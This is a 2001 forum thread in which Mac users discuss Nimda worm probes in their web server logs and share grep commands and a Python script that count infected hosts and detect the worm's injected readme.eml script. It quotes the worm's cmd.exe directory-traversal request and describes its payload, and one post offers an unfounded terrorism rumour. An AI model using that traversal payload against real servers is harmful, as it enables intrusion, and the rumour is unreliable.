Code Red III

fiznutz

mind bender
Anyone seen this? The logs are going crazy. It's supposedly called Nimda; it makes Code Red look like the folks in the retirement home. I've gotten like 5 hits a minute, in contrast to Code Red's 68 per day. This is for sure going to screw up M$ servers.
I've tried with no success to modify, was it whitesaint's scripts, to count this new bastard. But my Unix skills are limited.
Check your logs its crazy!
 

Red Phoenix

Registered
I get the same thing. It's full of things like

GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307

Fortunately, the latest BetterConsole has transparency and doesn't pop up all the way to the front when this happens.
 

Darkshadow

wandering shadow
That <b>GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307</b> is actually the backdoor hack that Code Red II implements ... this thing tries 16 different ways to infect a server, the backdoor Code Red II made being one of 'em. Freakin annoying, I've already gotten over 100 hits from this in the past hour and a half! And I'm only on a dialup connection. I'd hate to have an all-the-time connection, your log would get to monstrous proportions :p (Let me gloat, it's not like I usually get to say "Yeah, my 56K modem that only connects at 31200 bps is better than your T1/Cable/DSL." Heh)

I'm thinking I'll add to the daily script to clean out my http logs until this one blows over...
 

jimr

McInstigator
I had to patch my router and add some new filters to stay on line.


This one sends 16 messages at a time, as opposed to CODE RED,
which was only exploiting one hole.

I found that most of the machines had only up to 6 vulnerabilities during August infections.

The ones that had up to 6 were able to be shut down by davebrit's script.

Yesterday, I found one with 13 vulnerabilities!!!!

Then when I linked to that machine it sent a copy of the bug to me via HTTP.

Mozilla popped up and said what to do with this octet-binary.

Then I said, send it to hexedit.

So hexedit opens and I was totally surprised to see: <b>like a dictionary of Windows hacks inside of this thing!!!</b>

plus a JavaScript which it attaches to the bottom of every HTML page on the server.

The JavaScript is basically

<b>window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</b>

6000 from the top of the window, that is....!!!


Internet Explorer (OS X) just tried to display the multipart MIME information in a window it opened at the top of the screen (not at 6000!!!).

Some people still might answer yes to execution on Windows, or save to disk and then double-click it to open it.

The file was called readme.eml.

When you save it, it naturally saves as readme.exe (or 2983fejy.exe).

Never much of a reason to put a readme into an executable... these days.

Anyway, the site I found was owned by the Japanese government and was an information site for kids and parents about some activity center.

I nabbed their fax number and sent them a message
(Japanese sites seem to never have a contact e-mail address on the web site <br>comes from using Windows, I guess).
The site was missing in the morning.



Then the same code may become embedded in every mail message which goes out from the server.

Unpatched versions of Outlook will open it and execute it without any warning.
<blockquote>
So this thing is really easy to get..... especially in the family computer.
</blockquote>
<b>
and then it proceeds to <br>--replace a bunch of other files with itself (so it runs often if you use the machine--if you can actually use one of these machines),<br>-- give "guest" admin privileges, <br>--share all of your drives to the net, <br>--mess up your mail and all your web pages

!!!
</b>
so, Like Bush is planning, someone is just <br>"smoking Microsoft out of their
holes and they will be Destroyed".

The Attorney General denies it, but certainly the persistent rumor in my mind
is that this is related to a terrorist attack on the internet.
<ul>
<li>First discovered 9:00am one week after the attack on the WTC.

<li>Also this is exactly 3 months from Microsoft's announcement of the discovery of CODE RED I, June 18th, 2001.
</ul>

<i>Mac users stay alert please!!!!!!</i>
 

Darkshadow

wandering shadow
I kinda doubt it's from terrorists. They want to do something that's actually going to cause widespread panic - and while sysadmins everywhere are probably going "God, what's next" it isn't actually affecting the mass population *that* much.

I threw together a perl script that will list the addresses & the number of hits you've gotten from this worm. It was a quick thing I did, so feel free to optimize it if ya want (if ya do, post back what ya added so I can join in the fun too!). One thing to note, it doesn't list the very first address returned. Dunno why. Actually, I know why, I'm not a big giant perl scriptor. :p

I noticed that all the hits from the worm are coming from the same network block I'm on...so I'm guessing it doesn't do random IP numbers like Code Red does. Lot more annoying though. :mad:

You can get the script <a href="http://homepage.mac.com/darkshadow2/misc/newworm.pl">here</a>.
 

Red Phoenix

Registered
I noticed that all the attacks I was getting were local, too (before, I would get things on Road Runner, but they would be from Hawaii or California, when I'm in Ohio). It seems to stick to the computer's subnet mask. So here's a question: does Nimda actually do anything, other than show that there are a ton of holes in Windows? I mean, if it finds a hole, does it do anything after that? Not having a weakling of a machine that I care to infect, I haven't seen any damage other than slow network access come from all this.
 

RacerX

Old Rhapsody User
Maybe that is the "concept" part. It could have been designed to test a delivery system and got away from the designers. If it was released by accident, before a package could be added, then this may stop a future release (or make it less effective). At any rate, this is just another spotlight on the problems with the security of Microsoft's operating systems.
 

Red Phoenix

Registered
Macosxhints.com has a post on their page (although it was missing a "q" when I read it) that typing

grep -i "_vti_bin" /var/log/httpd/access_log* | cut -f 1 -d ' ' | sort | uniq

in the Terminal will give all of the unique IPs of the infected machines, and typing

grep -i "_vti_bin" /var/log/httpd/access_log* | cut -f 1 -d ' ' | sort | uniq | wc -l

will count how many those were. Just 57 hours after Nimda was first released, I have been attacked by 260 different IPs. Freakin' Windows.
 

IanTheTerrible

Registered
Another interesting command, based on the fact that most of the requests Nimda sends are attempting to retrieve .exe files:

cat /path/to/apache/log | grep .exe | wc -l

will return the total count of requests for .exe files. Obviously, if you're actually serving .exe files, you'll want to adjust the grep pattern.

I've taken over 28,000 hits (DSL connection) so far.

--Ian the Terrible
 

jimr

McInstigator
<blockquote>
So here is a question: does Nimda actually do any...
</blockquote>

To Mac OS X, no.

To Windows... plenty.

It replaces various key system files with copies of itself.

richedit32.dll... not minor for Word users.

It gives "guest users" admin privileges.

Looks like there is not an easy way to clean it up.

That's pretty damaging.

There was another rather harmless "concept" virus Word macro in 1996.
This is unrelated.

The executable, if you see it, has

<code>
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
</code>
there have been links posted which answer your questions.
 

Darkshadow

wandering shadow
I updated the perl script. Now it shows the first address returned (found out my goof), displays them in a table rather than in a single column (I hadn't thought of how long that list would get :p), and I added in the total number of requests made from the worm - should've thought of that one in the first place! (uses .exe to search for, so like <b>IanTheTerrible</b> said, if you serve .exe files, you should change that...I think c+dir would work, as all the strings it sends have that in 'em, too).

My script actually does use the commands from MacOSXHints.com - a little modified. Well, really, just changed it from searching for _vti_bin to MSADC. I saw in my logs that every once in a while, a worm won't try all 16 requests, but only the first 6 or so. When that happens, it never calls for the _vti_bin one, so that wouldn't show up. I changed that to MSADC, 'cause that's in the second string that it sends & is in all of 'em.

ya can grab the script here: <a href="http://homepage.mac.com/darkshadow2/misc/newworm.pl">newworm.pl</a>

(Heh, ok, not a very original file name. So sue me! :D)
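As an added example (not Darkshadow's newworm.pl and not anything posted in this thread), here is a Python version of the log pipelines people have been trading above, plus a check for the readme.eml script jimr found appended to HTML pages. The access_log lines inside it are constructed, not real captured traffic. It keys the count on the "c+dir" string, following Darkshadow's observation that every request the worm sends carries it while "_vti_bin" only appears when a host gets through all 16 requests, and it also shows the false positive IanTheTerrible warned about when a server legitimately serves .exe files.

```python
import re
from collections import Counter

# One Apache common-log-format line: client IP, then the quoted request line,
# then status and size. Only the fields the thread's pipelines use are captured.
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Marker for a worm probe: the cmd.exe?/c+dir tail that every request string
# carries (Darkshadow's note). _vti_bin is kept only to show what it misses,
# and .exe reproduces IanTheTerrible's "grep .exe | wc -l" count.
WORM_RE = re.compile(r'cmd\.exe\?/c\+dir', re.I)
VTI_BIN_RE = re.compile(r'_vti_bin', re.I)
EXE_RE = re.compile(r'\.exe', re.I)

# The script jimr quoted from infected pages:
#   window.open("readme.eml", null, "resizable=no,top=6000,left=6000")
INJECTED_RE = re.compile(r'window\.open\(\s*["\']readme\.eml["\']', re.I)

# Constructed sample log: two probing hosts (10.0.0.9 stops after the first
# few requests and never asks for _vti_bin) and one ordinary visitor who
# legitimately downloads an .exe file.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Sep/2001:09:01:12 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
10.0.0.5 - - [18/Sep/2001:09:01:12 -0400] "GET /MSADC/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
10.0.0.5 - - [18/Sep/2001:09:01:13 -0400] "GET /_vti_bin/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
10.0.0.9 - - [18/Sep/2001:09:02:40 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
10.0.0.9 - - [18/Sep/2001:09:02:40 -0400] "GET /MSADC/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
192.0.2.44 - - [18/Sep/2001:09:05:01 -0400] "GET /downloads/setup.exe HTTP/1.1" 200 48213
192.0.2.44 - - [18/Sep/2001:09:05:09 -0400] "GET /index.html HTTP/1.1" 200 1532
"""


def parse_access_log(text):
    """Return a list of (client_ip, request_path); lines that don't parse are skipped."""
    entries = []
    for line in text.splitlines():
        m = CLF_RE.match(line)
        if m:
            entries.append((m.group("ip"), m.group("path")))
    return entries


def worm_hits_by_ip(text):
    """Per-address count of worm probes, the table Darkshadow's script prints."""
    return Counter(ip for ip, path in parse_access_log(text) if WORM_RE.search(path))


def unique_probing_ips(text):
    """Same answer as `... | cut -f 1 -d ' ' | sort | uniq | wc -l`, keyed on c+dir."""
    return len(worm_hits_by_ip(text))


def vti_bin_ips(text):
    """Addresses the original _vti_bin grep reports; hosts that stop early are missed."""
    return {ip for ip, path in parse_access_log(text) if VTI_BIN_RE.search(path)}


def naive_exe_count(text):
    """IanTheTerrible's `grep .exe | wc -l`; legitimate .exe downloads inflate it."""
    return sum(1 for line in text.splitlines() if EXE_RE.search(line))


def has_injected_readme_script(html):
    """True if a served page carries the readme.eml window.open() the worm appends."""
    return bool(INJECTED_RE.search(html))


if __name__ == "__main__":
    for ip, hits in worm_hits_by_ip(SAMPLE_LOG).most_common():
        print(f"{ip:<16} {hits} probes")
    print("unique probing addresses:", unique_probing_ips(SAMPLE_LOG))
    print("addresses the _vti_bin grep would catch:", sorted(vti_bin_ips(SAMPLE_LOG)))
    print("lines matching .exe (includes the real download):", naive_exe_count(SAMPLE_LOG))
    page = '<html><body>hi</body><script>window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>'
    print("page carries injected script:", has_injected_readme_script(page))
```

Run against a real log with `worm_hits_by_ip(open("/var/log/httpd/access_log").read())`. On the constructed input the _vti_bin grep reports only one of the two probing hosts, and the .exe count is one higher than the number of probes because of the genuine setup.exe download, which is exactly why the c+dir marker is the better key.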
 

Powermaster

Site Supporter
NetBarrier seems to stop Nimda attacks. I have had 44 IP addresses banned in the last couple of days. NetBarrier detects Nimda and Code Red, and you can choose in the options to have the sending IP address banned. It saves me a lot of ole bandwidth.
 